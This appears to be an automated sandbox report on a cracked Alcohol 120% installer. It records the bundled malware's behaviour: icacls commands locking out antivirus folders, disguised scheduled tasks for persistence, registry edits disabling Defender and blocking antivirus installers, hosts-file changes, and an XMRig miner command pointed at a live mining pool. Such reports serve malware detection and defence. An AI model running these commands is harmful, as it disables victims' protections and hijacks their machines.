icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\programdata\microsoft\temp\H.bat

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

C:\ProgramData\RealtekHD\taskhostw.exe

C:\ProgramData\RealtekHD\taskhostw.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {38F7F940-E9B4-4AD3-A79E-72A1BEE3C7C4} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]

C:\Programdata\RealtekHD\taskhost.exe

C:\Programdata\RealtekHD\taskhost.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C schtasks /query /fo list

C:\Windows\SysWOW64\schtasks.exe

schtasks /query /fo list

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ipconfig /flushdns

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c gpupdate /force

C:\Windows\system32\gpupdate.exe

gpupdate /force

C:\ProgramData\WindowsTask\MicrosoftHost.exe

C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u CPU --donate-level=1 -k -t4

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 23.63.101.153:80 apps.identrust.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
RU 109.248.203.91:21 tcp
RU 109.248.203.91:21 tcp
RU 152.89.218.85:80 taskhostw.com tcp
RU 185.139.69.167:3333 tcp

Files

\ProgramData\Setup\update.exe

MD5 36aadfa2332dc7e5077455ae5cb423ef
SHA1 47cdc34d12f4820a005bba735caed72296d2400a
SHA256 2240022c8262345cf4f7280141f53fc6fcc29b5436cf72a03581906665b9dda9
SHA512 4dfaae0949f7c362221d14d3d080e8eaa5d7a2e43892aec653f1045c2044a0d24390704774748ab7d1252ba8f3dea5008970f1e0d879ce3b3dc190002db2f56c

C:\ProgramData\Setup\taskhost.exe

MD5 ebe2c898363c9e42908504bf053ad018
SHA1 9b02d448e534d6078f117db09c7ceca3c63e8ea5
SHA256 f034d58596cbb1023b31c891bce2b14207700fa27fd1d5836b177327c9755175
SHA512 c8d23c03869541cf6f2d108ab00b790286f95b23d729a7d44a3b0cf75ba497831b0c1cbc6860e0d51e2d49edb03a2a9c3ee0272a7cc679ffd4f963df03010b86

C:\Program Files\Common Files\System\iediagcmd.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\programdata\microsoft\temp\H.bat

MD5 ec45b066a80416bdb06b264b7efed90d
SHA1 6679ed15133f13573c1448b5b16a4d83485e8cc9
SHA256 cbb4167540edebdb3ac764114da3a2d5173b6ae351789640b15fd79e0f80659e
SHA512 0b8aa1084912c167b8eab066edd7823016dd0214fb0cf97ededad6c462169995942d286c918f296e87fb499f495081901643722bd2b5872d5668a220d08c4f2c

C:\ProgramData\RealtekHD\taskhostw.exe

MD5 53f8233b58b8e3ba3e92d82cca29f119
SHA1 ea7cae955f884aab7d048b6297fc0e472bb94a76
SHA256 a114d6bccc183021671bbb15426cf227ec487f2379094ed6f19e4211efd3ce65
SHA512 d1d4f385be4c8b8bdd16c8a8cc1fb75b6cee094ce69633724a4f53255dc560983097d26dc3b4d3e44a0eb718ac8ddb8d37c3b80f2c8747810f9c873ced558b23

C:\Users\Admin\AppData\Local\Temp\Cab5EF.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar7AB.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3ef069807ffd69363e4722be8c064113
SHA1 88c11ca8e42aa6feba3bb9973ea05504cd9c2b02
SHA256 840ab194309422ec0bdf7845ac39b1764c044d641420b608291128cec10c1583
SHA512 76ce2760c4ed73c8eff9fc8414fffe95a83c12016011e0f9b2fd272cc0203b362e99e0f8e635d4debb6400970645355839e2c91892c234abed90dc08eb6651da

C:\Windows\System32\drivers\etc\hosts

MD5 78a6999aab837db409e9ab000a77a271
SHA1 a3f75992147f10e2f16257a59cf7979c85d144cc
SHA256 96e81b168383ac3d2d95528b4870d5099a4ce22e4dc0cba15ab65a7f5520c3ba
SHA512 179848931237b8b1e272d8a75ac638b44461b421abba54bff784ca6d71ec4407b2249323c548763a42f0921419a873d3fdb3e058ee416290f5a85b5dadb0387a

C:\ProgramData\RealtekHD\taskhost.exe

MD5 de88d7ec667dea756d236e9053d7eeb9
SHA1 ac6b619acece942f27d75e1e0ea46b94bc9b91a9
SHA256 7ce418c4a92d459b2a1971bd32ac4dfea3711393b1dce49d0c92d7124d71e157
SHA512 5c655def3bb5ab9c0255802e0c40667f16ef48f1042ff1c57e13199b38f0059cbff33517d6e940c39ca7d16d346830a92800e89058ae58ee02826472b0935942

C:\ProgramData\WindowsTask\winlogon.exe

MD5 ec0f9398d8017767f86a4d0e74225506
SHA1 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512 d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

memory/2176-457-0x0000000000F90000-0x000000000107C000-memory.dmp

memory/2176-468-0x0000000000F90000-0x000000000107C000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 5ef47a9801b03d36f4e937e18de1f51b
SHA1 04212c27ba6858c54e6fad363f141fa52a8c4ad6
SHA256 a368d680dd1702b93ef730844ff4cc81f53ec68fa3bd753630e1a38576c08520
SHA512 99324ffef9517a8f9cc43ccc19065516d4038d826ac6b295880d6e33ac2f4834d04b69de1a9419cd55c7acf4d415e6e19b6eaf5f5de5f11e8de1bc82e5c81b24

C:\ProgramData\WindowsTask\OpenCL.DLL

MD5 12d6e576f527f671dfe0815de2902f36
SHA1 60a178947aef515367cc3489ce64b36332ecd78f
SHA256 7cc0d32b00f4596bf0a193f9929e6c628bc1b9354678327f59db0bd516a0dd6b
SHA512 c1b7c1669ec3b81249bb3ea50dfa41804470a21aa98e990d5f1656d7fa155bfc61a33f1113714ba741bbc0cdd710349ceb26b10f767c538a6d9c4cca661f562a

C:\ProgramData\WindowsTask\MicrosoftHost.exe

MD5 a74ad3584394b0766ada52191b245013
SHA1 6b25f4ba2c86541d4e2e5872a63fa1005373966b
SHA256 1e66a4b8154bf4559ec8745bee4130906e0dfeb3ea4992c7bb8d217d2b662737
SHA512 5976aa8dd83547613a1a2fff40e4c6ac0c4aff2eb55995e65c5d532768e714504be848a95f055512d1a044527e053ab81bf5c07725f6b7406a5c5c10b26e1be6

memory/2128-646-0x0000000000100000-0x0000000000110000-memory.dmp

C:\ProgramData\WindowsTask\WinRing0x64.sys

MD5 0c0195c48b6b8582fa6f6373032118da
SHA1 d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA256 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512 ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240508-en

Max time kernel

131s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-10.10.2014\msimg32.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2308 wrote to memory of 1656 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2308 wrote to memory of 1656 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2308 wrote to memory of 1656 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-10.10.2014\msimg32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-10.10.2014\msimg32.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3756,i,9746875443948590908,1444894342962555245,262144 --variations-seed-version --mojo-platform-channel-handle=4696 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240508-en

Max time kernel

92s

Max time network

99s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-21.04.2015\msimg32.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3492 wrote to memory of 2912 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3492 wrote to memory of 2912 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3492 wrote to memory of 2912 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-21.04.2015\msimg32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-21.04.2015\msimg32.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20240221-en

Max time kernel

120s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\tool uninstall Alcohol\sptdremov.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\tool uninstall Alcohol\sptdremov.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\tool uninstall Alcohol\sptdremov.exe"

Network

N/A

Files

memory/2232-0-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2232-1-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2232-2-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20231129-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-19.11.2013\MSIMG32.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-19.11.2013\MSIMG32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-19.11.2013\MSIMG32.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 264

Network

N/A

Files

memory/1752-2-0x00000000000F0000-0x00000000000F2000-memory.dmp

memory/1752-3-0x0000000000101000-0x0000000000102000-memory.dmp

memory/1752-4-0x0000000000100000-0x0000000000102000-memory.dmp

memory/1752-1-0x00000000000F0000-0x00000000000F2000-memory.dmp

memory/1752-0-0x00000000000F0000-0x00000000000F2000-memory.dmp

memory/1752-5-0x0000000000101000-0x0000000000102000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20240419-en

Max time kernel

119s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-25.12.2011\MSIMG32.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-25.12.2011\MSIMG32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-25.12.2011\MSIMG32.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1680 -s 264

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240226-en

Max time kernel

140s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3996 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
GB 142.250.187.202:443 tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nss25F4.tmp\SetupHlp.dll

MD5 65112ef6166d441df23715707c7488f7
SHA1 6e8ffef9a32978f43529b12e4a984df6365101be
SHA256 3b8406b26ba2f856192ded44e707d8a1a81daee89403a2600cae085e48b49713
SHA512 c0d1e5214958630beae24e4b2e8bf67553a1c695df7c3e78ff4a69a1ab27e8ded53a87d696185b0defc460ee2c3ac3e6912be263f332de04bcdabe3ecb9e589e

memory/3544-4-0x0000000074C50000-0x0000000074C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nss25F4.tmp\System.dll

MD5 c17103ae9072a06da581dec998343fc1
SHA1 b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d
SHA256 dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f
SHA512 d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f

memory/3544-14-0x0000000074C50000-0x0000000074C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nss25F4.tmp\LangDLL.dll

MD5 9384f4007c492d4fa040924f31c00166
SHA1 aba37faef30d7c445584c688a0b5638f5db31c7b
SHA256 60a964095af1be79f6a99b22212fefe2d16f5a0afd7e707d14394e4143e3f4f5
SHA512 68f158887e24302673227adffc688fd3edabf097d7f5410f983e06c6b9c7344ca1d8a45c7fa05553adcc5987993df3a298763477168d4842e554c4eb93b9aaaf

memory/3544-24-0x00000000746C0000-0x00000000746D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nss25F4.tmp\nsDialogs.dll

MD5 c10e04dd4ad4277d5adc951bb331c777
SHA1 b1e30808198a3ae6d6d1cca62df8893dc2a7ad43
SHA256 e31ad6c6e82e603378cb6b80e67d0e0dcd9cf384e1199ac5a65cb4935680021a
SHA512 853a5564bf751d40484ea482444c6958457cb4a17fb973cf870f03f201b8b2643be41bccde00f6b2026dc0c3d113e6481b0dc4c7b0f3ae7966d38c92c6b5862e

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\ProgramData\Setup\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\ProgramData\Setup\update.exe N/A

Modifies visibility of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" C:\Programdata\RealtekHD\taskhost.exe N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocks application from running via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" C:\ProgramData\Setup\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" C:\ProgramData\Setup\update.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\ProgramData\Setup\update.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\ProgramData\Setup\update.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\ProgramData\Setup\taskhost.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
